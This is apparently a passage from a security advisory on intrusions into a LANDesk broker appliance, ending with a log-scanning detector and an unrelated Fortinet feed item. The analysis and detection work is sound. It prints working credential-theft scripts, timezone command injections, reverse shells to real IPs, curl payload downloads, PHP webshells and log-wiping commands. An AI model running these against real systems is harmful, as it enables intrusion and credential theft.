                    os.chmod(f, 0o777)
                    m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                    if m:
                        set_msg(dbpwd, "PASSWORD", m)
                        time.sleep(30)
                        set_msg(dbpwd)
                        exit()
    else:
        set_msg(dbpwd, 'ERROR', 'NO BACKUP')

    import os, re, base64, time
    os.chdir("/tmp")
    d = "/backups"
    def set_msg(p, t='', m=''):
        if t and m:
            msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
        else:
            msg = ''
        os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
    try:
        r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
    except:
        r = None
    with open("/opt/landesk/broker/broker.conf") as f:
        dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
    if r:
        p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
        os.system("tar zxvf {}".format(r))
        while True:
            for f in os.listdir('.'):
                if re.match("php\w{6}", f):
                    os.chmod(f, 0o777)
                    m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                    if m:
                        set_msg(dbpwd, "PASSWORD", m)
                        time.sleep(30)
                        set_msg(dbpwd)
                        exit()
    else:
        set_msg(dbpwd, 'ERROR', 'NO BACKUP')

    import os, re, base64, time
    os.chdir("/tmp")
    d = "/backups"
    def set_msg(p, t='', m=''):
        if t and m:
            msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
        else:
            msg = ''
        os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
    try:
        r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
    except:
        r = None
    with open("/opt/landesk/broker/broker.conf") as f:
        dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
    if r:
        p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
        os.system("tar zxvf {}".format(r))
        while True:
            for f in os.listdir('.'):
                if re.match("php\w{6}", f):
                    os.chmod(f, 0o777)
                    m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                    if m:
                        set_msg(dbpwd, "PASSWORD", m)
                        time.sleep(30)
                        set_msg(dbpwd)
                        exit()
    else:
        set_msg(dbpwd, 'ERROR', 'NO BACKUP')

    import os, re, base64, time
    os.chdir("/tmp")
    d = "/backups"
    def set_msg(p, t='', m=''):
        if t and m:
            msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
        else:
            msg = ''
        os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0,attempts=0 where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
    with open("/opt/landesk/broker/broker.conf") as f:
        dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
        p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip()
        v = p.split(':')
        k = os.popen('base 64 -w0 root/.certs/{}.key'.format(v[1])).read()
        set_msg(dbpwd, "PASSWORD", p+'||'+k)
        time.sleep(30)
        set_msg(dbpwd)

    import os, re, base64, time
    def set_msg(p, t='', m=''):
        if t and m:
            msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
        else:
            msg = ''
        os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0 where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
    os.chdir("/tmp")
    d = "/backups"
    try:
        r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
    except:
        r = None
    with open("/opt/landesk/broker/broker.conf") as f:
        dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
        os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd))
        if r:
            p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
            os.system("tar zxvf {}".format(r))
            while True:
                for f in os.listdir('.'):
                    if re.match("php\w{6}", f):
                        os.chmod(f, 0o777)
                        m = os.popen("./{} '{}' '{}' '{}' root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                        if m:
                            set_msg(dbpwd, "PASSWORD", m)
                            time.sleep(30)
                            set_msg(dbpwd)
                            exit()
        else:
            set_msg(dbpwd, 'ERROR', 'NO BACKUP')

    import os, re, base64, time
    os.chdir("/tmp")
    d = "/backups"
    def set_msg(p, t='', m=''):
        if t and m:
            msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
        else:
            msg = ''
        os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
    try:
        r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
    except:
        r = None
    with open("/opt/landesk/broker/broker.conf") as f:
        dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
        os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd))
    if r:
        p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
        os.system("tar zxvf {}".format(r))
        while True:
            for f in os.listdir('.'):
                if re.match("php\w{6}", f):
                    os.chmod(f, 0o777)
                    m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                    if m:
                        set_msg(dbpwd, "PASSWORD", m)
                        time.sleep(30)
                        set_msg(dbpwd)
                        exit()
    else:
        set_msg(dbpwd, 'ERROR', 'NO BACKUP')

    Decoded datetime.php 'timezone' Exploit base64 Scripts

    Sep  5 01:09:59 REDACTED gsb[996]: /etc/php.ini rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo import os,
re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)} {Sep  5 01:47:01 REDACTED gsb[2599]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p 
= os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  | /usr/bin/base64 -d | python;’ (1)} {Sep  5 02:14:08 REDACTED gsb[1273]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:         
         set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)} {Sep  5 22:22:06 REDACTED gsb[9367]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)} {Sep  6 02:39:11 REDACTED gsb[21266]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, 
m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  | /usr/bin/base64 -d | python;’ (1)} {Sep  6 03:03:44 REDACTED gsb[11427]: /etc/php.inirewritten with new timezone: ‘;bash /tmp/Xa27efd2.tmp;’ (1)} {Sep  8 05:18:35 REDACTED gsb[5132]: /etc/php.inirewritten with new timezone: ‘;/sbin/backuptool –backup;’ (1)} {Sep  8 05:19:34 REDACTED gsb[5325]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith 
open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   | /usr/bin/base64 -d | python;’ (1)} {Sep  8 10:37:35 REDACTED gsb[6196]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 -ssl -e /bin/bash;’ (1)} {Sep  8 10:40:38 REDACTED gsb[8758]: /etc/php.inirewritten with new timezone: ‘;curl https://gggg.oyr2ohrm.eyes.sh/;’ (1)} {Sep  8 10:41:35 REDACTED gsb[7475]: /etc/php.inirewritten with new timezone: ‘;curl 98.98.54.209/a.sh -o /dev/shm/a.sh;’ (1)} {Sep  8 13:10:37 REDACTED gsb[22555]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 –ssl -e /bin/bash;’ (1)} {Sep  8 13:21:06 REDACTED gsb[24954]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 –ssl -e /bin/bash;’ (1)} {Sep  8 20:23:14 REDACTED gsb[1899]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = 
max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\’admin\\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“\n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“php\w{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)} {Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo python -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“45.33.101.53”,443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’== | /usr/bin/base64 -d | /bin/bash;’ (1)} {Sep 10 11:48:32 csa gsb[6829]: /etc/php.inirewritten with new timezone: ‘;/bin/python -c ‘importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“156.234.193.18”,44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’;’ (1)} {Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, timeos.chdir(“/tmp”)d = “/backups/backup-09-01-2024_010101.tar.gz”with open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if os.path.exists(d):  os.system(“tar zxf {}”.format(d))  pwd = 
os.popen(“export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().strip()  p = pwd.split(‘:’)  k = os.popen(“cat root/.certs/{}.0″.format(p[1])).read().strip()  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, ‘{}’, ‘1’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[0:200], k[200:700]))  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, ‘{}’, ‘2’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[700:900], k[900:]))  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, ‘{}’, ‘3’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, pwd[0:200], pwd[200:700]))  time.sleep(60)  os.system(”’export PGPASSWORD={};echo “DELETE FROM blockedcerts”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))  os.system(“rm -rdf *;rm -rf *”)== | /usr/bin/base64 -d | python;’ (1)} Appendix B: Sudo Commands See Table 14 for a list of known sudo commands executed by the threat actors. Command Use sudo:  nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo 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 | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin; Updates the “organization” field of the “admin” account in the PGSQL database with python script decoded from base64.  The python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database. 
  • sudo: nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0
    Use: Temporarily disables SELinux.
  • sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 >/opt/landesk/broker/webroot/gsb/site.cnf
    Use: Exfiltrates credentials and places them in a site.cnf web file.
  • sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjA zNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d >/opt/landesk/broker/webroot/gsb/view.php
    Use: Creates a webshell at view.php.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire --update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4Gq FwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm 9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash;
    Use: Creates a webshell at help.php.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setPhpTimeZone($TIMEZONE)/\/\/ setPhpTimeZone()/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php
    Use: Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setSystemTimeZone( $TIMEZONE )/\/\/ setSystemTimeZone( $TIMEZONE )/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php
    Use: Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/GSB main page/GSB main page\neval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"])\;/g' /opt/landesk/broker/webroot/client/index.php
    Use: Adds a webshell into index.php.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/$canvas_height = 600;/$canvas_height = 600;\n\teval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"]);/' /opt/landesk/broker/webroot/gsb/style.php
    Use: Adds a webshell into style.php.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php
    Use: Timestomping attempt to change the access and modification time of index.php.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php
    Use: Timestomping attempt to change the access and modification time of style.php.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php
    Use: Timestomping attempt to change the access and modification time of DateTimeTab.php.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php
    Use: Timestomping attempt to change the access and modification time of help.php.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages
    Use: Removes evidence.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf
    Use: Removes the site.cnf file (exfiltrated credentials).
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php
    Use: Removes one of the original webshells.
  • sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/view.php
    Use: Removes one of the original webshells.
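As an added defender-side example (not code from the advisory, from CISA or from the appliance vendor), the following Python parses the "rewritten with new timezone" log entries quoted above and flags any value that is not a well-formed IANA zone name, which is exactly the indicator the setPhpTimeZone log line provides before the actors comment it out. The log lines and the TEST-NET address inside it are constructed for the demo.

```python
import re
from typing import Optional

# Syslog line format taken from the log excerpts in the advisory; the space before
# "rewritten" is optional because the excerpts render the line both ways.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) gsb\[(?P<pid>\d+)\]: "
    r"/etc/php\.ini ?rewritten with new timezone: '(?P<tz>.*)'\s*$"
)

# Shape of a legitimate IANA zone name (Europe/Rome, America/Argentina/Buenos_Aires, Etc/GMT+5).
IANA_TZ_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_+\-]*(/[A-Za-z0-9_+\-]+)*$")

# Characters a timezone never contains but a shell injection needs.
SHELL_META_RE = re.compile(r"[;&|`$(){}<>\\\"'\s]")


def parse_timezone_log(line: str) -> Optional[dict]:
    """Return the fields of a 'rewritten with new timezone' line, or None for any other line."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(tz: str) -> str:
    """'ok' for a well-formed zone name, otherwise a 'suspicious: ...' reason."""
    if IANA_TZ_RE.match(tz):
        return "ok"
    if SHELL_META_RE.search(tz):
        return "suspicious: shell metacharacters in timezone"
    return "suspicious: not an IANA zone name"


def extract_commands(tz: str) -> list:
    """Split an injected value of the form ';cmd1;cmd2;' into its individual commands."""
    return [part.strip() for part in tz.split(";") if part.strip()]


def scan(lines) -> list:
    """Run every line through the parser and return one finding per suspicious timezone write."""
    findings = []
    for line in lines:
        rec = parse_timezone_log(line)
        if rec is None:
            continue
        verdict = classify(rec["tz"])
        if verdict == "ok":
            continue
        findings.append({
            "ts": rec["ts"], "host": rec["host"], "pid": rec["pid"],
            "timezone": rec["tz"], "reason": verdict,
            "commands": extract_commands(rec["tz"]),
        })
    return findings


# Constructed sample log: one benign write, one unrelated sshd line, two injected values
# mirroring the pattern in the advisory (198.51.100.7 is a TEST-NET address, not a real host).
SAMPLE_LOG = [
    "Sep  5 01:09:59 csa gsb[996]: /etc/php.ini rewritten with new timezone: 'America/New_York'",
    "Sep  8 05:18:35 csa gsb[5132]: /etc/php.ini rewritten with new timezone: ';/sbin/backuptool --backup;'",
    "Sep  8 05:18:36 csa sshd[2201]: Accepted publickey for admin from 192.0.2.10 port 51234 ssh2",
    "Sep  8 10:41:35 csa gsb[7475]: /etc/php.inirewritten with new timezone: ';curl 198.51.100.7/a.sh -o /dev/shm/a.sh;'",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['ts']} pid={finding['pid']} {finding['reason']}: {finding['commands']}")
```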

  • 2025-003: Critical Vulnerabilities in Fortinet Products
    by Latest publications of type Security Advisories on 15 Gennaio 2025 at 1:26 pm

    On January 14, Fortinet released and updated several security advisories addressing multiple vulnerabilities ranging from low to critical severity. At least one critical vulnerability is known to be exploited in the wild. It is recommended to update as soon as possible and, if that is not possible, at least to apply the mitigations.